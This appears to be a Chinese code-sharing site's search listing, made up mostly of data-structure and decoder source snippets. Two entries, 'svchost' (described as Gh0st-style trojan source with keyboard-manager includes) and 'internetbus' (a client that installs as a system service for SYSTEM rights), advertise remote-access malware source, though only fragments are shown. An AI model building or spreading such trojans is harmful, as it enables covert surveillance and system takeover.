搜索资源列表
存储管理源代码
- 分区式存储管理源代码 一、可变分区存储管理的基本策略 1)不预先划分几个固定分区,分区的建立是在作业的处理过程中进行的,各分区的大小由作业的空间需求量决定。 2)采用指针方式将各个空闲分区链接而成的链表,用以记录主存分配现状。 3)分配与回收算法按空闲分区链接方式的不同分类,有最佳、最坏、首次和下次适应四种算法。 二、程序模拟的设计 1、基本思想 采用事件驱动模型。事件有: 1)申请主存事件,表示一个作业创建时提出的主存资源要求; 2)释放主存事件,表示一个作
Jpegdecoder
- void III_hufman_decode(struct Granule *gr,int part2_start, int freqline[SBLIMIT][SSLIMIT]) { unsigned int reg1, reg2,i unsigned int part3_length = part2_start + gr->part2_3_length unsigned used int h,*f=&freqline[0][0]
all
- data struct algorithm and application in c++ 一书的课后答案源码
All-Data-Struct-CPP
- 数据结构所有代码C++实现,对学习C++有很大的帮助.-All data structures implemented in C++ code!
Data-Struct
- 朱战立版本 数据结构(c++描述)全书代码 西安电子科技大学出本社 -Zhu war a version of the data structure (c descr iption) book code Xi an University of Electronic Science and Technology of the agency
internetbus
- 其中客户端源代码做了调整: 1. 枚举进程使用函数改为:CreateToolhelp32Snapshot()等。 2. 为了获得system权限,客户端注册为系统服务运行。-typedef LONG NTSTATUS typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG ProcessId UCHAR ObjectTypeNumber U
ch01
- 严蔚敏数据结构范例,初学者可以用参考。一共一百多个范例,用心敲入的话还是挺有用的-Data struct example
cPPcode
- C++编程思想源码 //: 2_1.CPP -- Public is just like C struct #include "2_1.h" struct A{ int i char j float f void foo() } void A::foo(){} struct B{ public: int i char j float f void foo() } void B::
pictrue-struct
- 一个建立图论的三种方法,很实用,可以用作模板-An establishment of three methods of graph theory, it is practical and can be used as a template
Seon
- Buble, Hap, Struct File.
datastr
- 程序的算法加数据结构,认真分析下数据结构吧。提高编程能力。-programe consist of algrithm and data struct.anlyse this book serious.ok
svchost
- ghost小马源码,喜欢的可以拿去研究。-// svchost.cpp : Defines the entry point for the console application. // #pragma comment(linker, /OPT:NOWIN98 ) #include ClientSocket.h #include common/KernelManager.h #include common/KeyboardManager.h #incl